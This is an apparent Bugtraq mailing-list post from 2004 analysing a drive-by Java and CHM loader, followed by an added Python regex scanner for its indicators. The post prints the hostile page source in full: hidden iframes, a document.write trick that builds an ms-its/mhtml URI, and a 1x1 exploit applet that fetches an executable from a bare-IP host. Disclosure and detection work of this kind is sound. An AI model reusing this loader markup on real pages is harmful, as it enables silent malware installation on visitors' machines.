List: bugtraq
Subject: Strange Java Loader
From: duffbeer <duffbeer () gmx ! net>
Date: 2004-12-30 6:34:23
Message-ID: 116798078.20041230073423 () gmx ! net
Hi People,
Before reading this,
don't go on any of the sites
unless you are sure ;)
After decrypting some stuff, this is the source from:
http://xxl-size.com/cogo.html
-------------------------------------
<iframe src="http://209.8.20.130/dl/adv346.php">
<iframe src="http://www.awmcash.biz/adverts/14/1.htm">
-------------------------------------
this is the source from one of the iframes
(http://209.8.20.130/dl/adv346.php):
----------------------------------------------------
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm'));
</script>
<applet width=1 height=1 ARCHIVE=loaderadv346.jar \
code=Counter></APPLET></body></html>
----------------------------------------------------
The jar archive loaderadv346.jar contains some Java classes
which exploit the URLClassLoader bug (BlackBox.class).
It overrides the sandbox and downloads a loadadv346.exe from:
http://209.8.20.130/dl/loadadv346.exe
This seems to be a dialer or something like this;
it changes the hosts file, creates some spawn files.
You can look for yourself, I included the file
and the Java stuff; the loadadv is upx'd.
So far, does anyone know how to protect from this crap?
You're welcome to send some solutions ;)
cya, Stefan
["loaderadv.zip" (application/x-zip-compressed)]
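As an added example (not part of Stefan's post or the loader itself), a small Python scanner for triaging captured HTML that flags the page-level indicators this loader uses: the ms-its:/mhtml: URI to a CHM, the text/x-scriptlet object, the hidden textarea whose contents are rewritten at runtime with document.write, the 1x1 applet, and iframes pointing at bare IP hosts. The sample page is constructed to resemble the quoted one, with a documentation-range address instead of the real host.

```python
import re

# Constructed sample resembling the loader page quoted in the post.
# 192.0.2.10 is a documentation address, not the host from the message.
SAMPLE_HTML = """<html><head></head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\\${PR}/g,'ms-its:mhtml:file://c:\\\\nosuch.mht!http://192.0.2.10/dl/x.chm::/x.htm'));
</script>
<applet width=1 height=1 ARCHIVE=loader.jar code=Counter></APPLET>
<iframe src="http://192.0.2.10/dl/adv.php"></iframe>
</body></html>"""

# Constructed benign page used as a negative control.
BENIGN_HTML = "<html><body><p>Hello</p><iframe src='https://example.org/'></iframe></body></html>"

# Detection rules: (indicator name, pattern). Names are our own labels.
RULES = [
    ("ms-its/mhtml URI", re.compile(r"\bms-its:|\bmhtml:", re.I)),
    ("CHM content reference", re.compile(r"\.chm::/", re.I)),
    ("scriptlet object", re.compile(r"<object[^>]*type\s*=\s*[\"']?text/x-scriptlet", re.I)),
    # a display:none textarea that immediately holds a tag is markup being smuggled, not a form field
    ("hidden textarea holding markup", re.compile(r"<textarea[^>]*display\s*:\s*none[^>]*>\s*<", re.I | re.S)),
    # static scanners miss the final URI because it is assembled by replace() at load time
    ("runtime template substitution", re.compile(r"document\.write\([^)]*\.value\.replace\(", re.I)),
    ("1x1 applet", re.compile(r"<applet[^>]*\bwidth\s*=\s*[\"']?1\b[^>]*\bheight\s*=\s*[\"']?1\b", re.I)),
    ("iframe to bare IP", re.compile(r"<iframe[^>]*src\s*=\s*[\"']?https?://\d{1,3}(?:\.\d{1,3}){3}", re.I)),
]


def scan_html(html: str) -> list[str]:
    """Return the names of all loader indicators present, in rule order."""
    return [name for name, pattern in RULES if pattern.search(html)]


def is_suspicious(html: str, threshold: int = 2) -> bool:
    """A single hit can be benign; two or more of these together is a loader signature."""
    return len(scan_html(html)) >= threshold


if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        hits = scan_html(page)
        print(f"{label}: suspicious={is_suspicious(page)} indicators={hits}")
```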